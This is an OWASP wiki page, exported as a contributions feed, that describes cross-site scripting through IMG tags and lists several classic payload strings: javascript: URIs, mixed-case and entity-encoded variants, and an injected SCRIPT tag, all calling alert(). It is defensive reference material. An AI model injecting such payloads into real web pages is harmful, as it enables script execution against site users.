https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=Paul+McCannOWASP - User contributions [en]2026-04-04T11:37:25ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Script_in_IMG_tags&diff=127286Script in IMG tags2012-04-02T16:05:14Z<p>Paul McCann: </p>
<hr />
<div>==Description==<br />
It is possible for an attacker to execute Javascript code via the IMG tags. This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.<br />
<br />
==Examples ==<br />
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.<br><br><br />
<br />
<IMG SRC="javascript:alert('Vulnerable');"><br><br />
<IMG SRC=javascript:alert('XSS')><br><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br><br />
<IMG SRC=`javascript:alert("RSnake says, <br><br />
'XSS'")`><br ><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br><br />
<IMG <br><br />
SRC=javascript:alert(String.fromCharCode(88,83,83))><br><br />
<IMG <br> SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
[[XSS Attacks]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Paul McCann